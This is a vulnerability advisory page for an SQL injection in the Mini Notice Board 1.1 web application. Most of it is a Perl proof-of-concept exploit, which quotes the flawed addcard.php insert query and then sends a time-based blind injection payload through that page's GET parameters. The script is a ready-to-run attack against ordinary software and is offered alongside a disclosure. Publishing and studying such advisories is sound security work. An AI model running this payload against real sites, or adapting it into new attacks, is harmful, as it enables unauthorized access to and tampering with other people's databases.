Mini Notice Board 1.1 SQL Injection

2016.11.02
Credit: N_A
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

#!/usr/bin/perl -w #mininoticeboard_v1.1 SQL Injection Exploit #========================================== #Discovered by N_A , N_A[at]tutanota.com #======================================== #Vendor has been notified #========================= #Description #============ #Mini Notice Board is a small noticeboard application that allows users to post notice cards online. e.g. if people want to sell their car #or lawnmower or want to provide services, they can simply write a card. #It supports unlimited Regions. #https://sourceforge.net/projects/mininoticeboard/ #Vulnerability #============= #addcard.php: #The variables from the GET request are fed unsanitized directly into the MYSQL database resulting in an SQL Injection #$title = $_GET["title"]; #$body = $_GET["body"]; #$contact = $_GET["contact"]; #$address = $_GET["address"]; #$tel = $_GET["tel"]; #$date_day = date("d"); #$date_month = date("m"); #$date_year = date("y"); #$romovalcode = genremovalcode(); #$categorie = $cid; #if($title!="" && $body!="" && $tel!="" && $contact!="") #{ # include 'dbconnect.php'; # $sqlset["tablename"] = $sqlset["tableprefix"].'content'; # mysql_query('INSERT INTO `'.$sqlset["tablename"].'` (`title`, `content`, `contact`, `address`, `tel`, `date_day`, `date_month`, `date_year`, #`removalcode`, `categorie`) VALUES (\''.$title.'\', \''.$body.'\', \''.$contact.'\', \''.$address.'\', \''.$tel.'\', \''.$date_day.'\', #\''$date_month.'\', \''.$date_year.'\', \''.$romovalcode.'\', \''.$categorie.'\')') or $status = 'red'; #Proof Of Concept Exploit attached below #N_A, N_A[at]tutanota.com use strict; use LWP::Simple; my ($url) = @ARGV; if( not defined $url ) { print "=========================================\n"; print "Mini Notice Board SQL Injection Exploit\n"; print "\tBy N_A\n"; print "\n"; print "$0 [URL]\n"; print "$0 127.0.0.1/mininoticeboard\n"; print "=========================================\n"; exit; } my $file = '/addcard.php'; #The Vulnerable .php file my $injection = 'title=pentest&body=blah\' OR (SELECT * FROM (SELECT(SLEEP(5)))jAEh) AND \'OKSG\'=\'OKSG&tel=555&contact=blahblah&address=blahblah&submit=Add+Card'; my $request ="http://".$url.$file."?".$injection; #Forming the exploit string my $content = get $request; die "Could not get $request" unless defined $content; #It should hang here for about 5 seconds..... (SLEEP(5)) as per injection print "##########################\n"; print "SQL Injection Successful!\n"; print "##########################\n"


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top